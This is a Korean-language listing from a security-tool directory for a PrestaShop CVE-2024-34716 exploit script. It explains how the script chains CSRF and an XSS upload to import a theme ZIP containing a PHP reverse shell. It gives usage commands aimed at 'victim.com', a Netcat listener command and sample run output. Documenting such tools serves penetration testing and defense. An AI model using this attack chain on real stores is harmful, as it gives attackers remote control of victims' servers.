Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Prestashop-CVE-2024-34716 — PrestaShop용 자동화된 CSRF 익스플로잇 스크립트로, 조작된 ZIP 페이로드를 통해 PHP 리버스 셸을 업로드 및 실행하며, 연결 캡처를 위해 Netcat 리스너가 필요합니다. | Kitploit
도구/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Payload GenerationExploitationShellcodeWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

PrestaShop용 자동화된 CSRF 익스플로잇 스크립트로, 조작된 ZIP 페이로드를 통해 PHP 리버스 셸을 업로드 및 실행하며, 연결 캡처를 위해 Netcat 리스너가 필요합니다.

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CSRF 및 리버스 셸 공격용 익스플로잇 스크립트

이 스크립트는 CSRF(사이트 간 요청 위조) 익스플로잇을 자동화하여 대상 웹 서버에 PHP 리버스 셸을 업로드하고 실행합니다. 리버스 셸은 조작된 CSRF 페이로드를 통해 ZIP 파일로 전달되며, 이는 권한 있는 사용자가 특정 엔드포인트와 상호작용할 때 트리거됩니다. 스크립트가 리버스 셸 연결을 캡처하려면 리스닝 중인 Netcat 인스턴스가 필요합니다.

현재 깨진 것 같습니다. 나중에 업데이트하겠습니다.

요구 사항

  • Netcat: Netcat이 설치되어 있고 지정된 포트(기본값: 9001)에서 리스닝할 수 있어야 합니다.
  • Python 3: 파일을 HTTP로 제공하는 데 사용됩니다.
  • Curl 및 JQ: HTTP 요청 및 JSON 구문 분석을 처리하는 데 사용됩니다.

사용법

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

인수

  • target_url: 대상의 기본 URL (예: https://example.com).
  • admin_endpoint: 관리자 테마 가져오기 엔드포인트의 경로.
  • admin_email: 관리자의 이메일 주소 (페이로드를 위조하기 위함).
  • attacker_ip: 리버스 셸 리스너가 연결을 수신할 IP 주소.

예시

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

익스플로잇 워크플로

  1. 리버스 셸 생성: 제공된 attacker_ip와 포트 9001을 사용하여 revshells.com에서 PHP 리버스 셸을 생성합니다.
  2. ZIP 패키징: 리버스 셸 스크립트(love.php)를 Love-exploit.zip으로 압축합니다.
  3. CSRF 토큰 가져오기: 대상에서 CSRF 토큰을 가져와 테마 가져오기 요청을 승인합니다.
  4. HTML 페이로드 구성: 자동으로 대상 관리자 패널에 악의적인 요청을 제출하여 리버스 셸을 가져오는 JavaScript 스크립트가 포함된 HTML 페이로드(csrf_payload.html)를 빌드합니다.
  5. HTTP 서버 설정: 임시 HTTP 서버(포트 8000)가 Love-exploit.zip을 제공하여 대상이 가져올 수 있도록 합니다.
  6. XSS 업로드 및 CSRF 트리거: CSRF 페이로드가 대상의 연락처 페이지에 업로드됩니다. 접근되면 CSRF 공격이 트리거됩니다.
  7. 리버스 셸 리스너: 공격자는 Netcat을 사용하여 피해자의 들어오는 연결을 모니터링합니다.

실행 단계

  1. 자신의 머신에서 Netcat 리스너를 시작하십시오:

    root@kitploit:~
    nc -nvlp 9001
    
  2. 스크립트를 실행하십시오:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. 대상이 CSRF 페이로드를 실행하고 리버스 셸 연결을 받을 때까지 기다리십시오.

출력

스크립트는 실행 중 다음 정보를 출력합니다:

  • CSRF 토큰 검색 상태.
  • 리버스 셸 생성 및 패키징 상태.
  • 페이로드 전달 및 HTTP 서버 상태.

중요 참고 사항

  • 권한: 이 스크립트는 대상 서버에서 실행 권한이 필요합니다. 무단 사용은 불법이며 법적 처벌을 받을 수 있습니다.
  • 테스트 환경: 사이버 보안 연구실과 같은 통제되고 승인된 환경에서만 사용하십시오.
  • 포트 충돌: 스크립트 실행 전에 포트 8000(HTTP 서버)과 9001(Netcat 리스너)이 사용 중이 아닌지 확인하십시오.

예시 출력

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

이 문서는 침투 테스터 및 사이버 보안 연구자가 통제된 환경에서 사용하기 위한 것입니다. 허가 없이 이 도구를 무단 목적으로 사용하는 것은 엄격히 금지됩니다.


면책 조항

이 스크립트는 교육 목적 및 합법적인 사이버 보안 평가용으로만 제공됩니다. 허가 없이 시스템에 대해 무단으로 사용하는 것은 불법이며 윤리적 지침에 위배됩니다.

도구 다운로드